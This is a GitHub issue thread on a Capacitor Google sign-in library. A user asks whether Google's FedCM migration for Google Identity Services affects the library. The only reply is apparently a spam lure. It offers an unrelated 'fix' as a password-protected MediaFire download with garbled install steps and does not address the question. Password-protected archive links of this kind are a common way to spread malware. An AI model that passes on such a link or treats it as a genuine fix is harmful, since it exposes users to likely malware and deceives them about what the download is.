### ISSUE TITLE
Question regarding FedCM on Google Deprecates?

### ISSUE THREAD

**Issue by noxomix** [CodetrixStudio/CapacitorGoogleAuth#391]
Hello, I saw in the Google Documentary that Google Plans to Change something in their GIS Client. 

![grafik](https://github.com/user-attachments/assets/f6b767df-4162-4ecc-8d96-2d2524c4fd47)

Described here:
https://developers.google.com/identity/gsi/web/guides/fedcm-migration

Im just wonderin if this will affect this Library in any way?

Best Regards
Theo

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
